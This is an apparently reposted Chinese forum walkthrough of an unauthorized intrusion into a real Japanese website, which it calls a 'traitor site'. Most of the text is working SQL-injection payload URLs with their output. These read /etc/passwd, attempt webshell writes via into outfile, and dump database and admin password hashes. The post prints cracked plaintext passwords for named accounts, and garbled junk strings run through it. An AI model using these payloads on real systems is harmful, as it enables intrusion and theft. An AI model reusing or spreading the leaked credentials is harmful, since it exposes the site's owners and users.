原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0 ?5 D( m" h( `8 J
0x01. 检测 www.zuaa.jp 收集数据

$ @0 A0 w! \- Z) n: O
# f: d$ Y- P$ {; R' ^( Z/ p. zwhatweb


利用NMAP扫描

" r  Z$ q( o) z中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
- e! ^4 |5 D( r1 j( K0 j找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390

' v  V) E+ f0 N2 V
  W. g4 w! `0 x8 Q0x03.order by
+ q4 D2 B3 U/ w  l' s             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
* `/ @+ E. ]  Q" n  ^3 o
  s% Z, q; T, w/ I+ norder by 28报错，order by 27正常

. I& Q' C. S8 a. F0 `' v$ q, {, L0x04.   union手动查询
; s& J5 O4 K9 G  H1 xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

. m8 j/ G4 z+ a- z中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

, M# \( ?, C0 G8 ~+ u3 a' C. X0x05. info:
( L0 {% b& R! F& H; zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 S; `+ O1 ?0 c' z: q  e
+ F' k- ?% Z* D) ^7 f( T1 Wuser:            root@localhost
database:    openpne
, `! }6 M6 R# C* {+ |version:      4.1.22
! X- S7 R- W, ]os:             portbld-freebsd5.4
6 W0 p& I8 w) G7 }/ Z  @) g
0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
* P+ I7 w+ n+ e; F) D* d1 K" Dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

通过工具转换

; n9 ]  K1 [3 I/ X1 O中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

2 M4 ^1 H/ R9 H7 l0 i0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
/ }( A, c+ L: G. ^, z5 M
4 E! C/ e4 U! ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
' z, X* |8 J  A! u, ?# m! o9 e" I
7 @" @) L8 P  g3 }1 `+ S0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
4 e- S% p0 |8 a$ b中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

" ^1 y/ b- L+ n. v" j
$ \* l" M7 W7 O3 f. b( Z  G
0x09. 查找后台
% e" h* r% v4 @. v% g, E0 c利用 现有的各种 后台工具尝试都不行
8 |- n( T3 r/ `9 N+ v5 g
0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
0 a. V+ e" Q+ C* ?可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
4 D2 r; `( e  D# g# m3 ~http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
4 t" e$ R; w& z& N
2 x( v" O$ `( |! ~! T/ J7 w这个可以在 www.cmd5.com 解密
* P, I% o1 a$ X3 m9 G( Y5 zroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
: d+ ^, Y5 z0 Kopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
" L3 v" _. _2 p* X; b- @) {zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
, M( ~% }$ I+ K( H( W2 P$ Z

9 \4 V5 [# l8 v& S/ n% H0x11. 网站突破
4 l; s( h0 t4 X9 y/ G7 Z发现网站的源程序 openpne, google 下载 openpne 源码


+ V+ [9 \* o) u0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
5 k: j0 V+ _* f6 W) k( dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
" y( Z# X- |8 k
- i, x, H5 I5 Z6 e* M9 }0 q解密
; c( O2 `& x9 ?2 ^7 S0 y- J/ S& czuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

% b7 C. Y. r: s& T& j& X0x13. 登录后台
. a1 e/ L6 }8 y0 S8 a7 M

3 G. L% s* I5 Y& V4 _
& D, n3 c3 i, X( C0x14. 小结
. a" F7 e; b+ G! a7 b: a利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
+ O  T6 n( P- ]- B. o中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的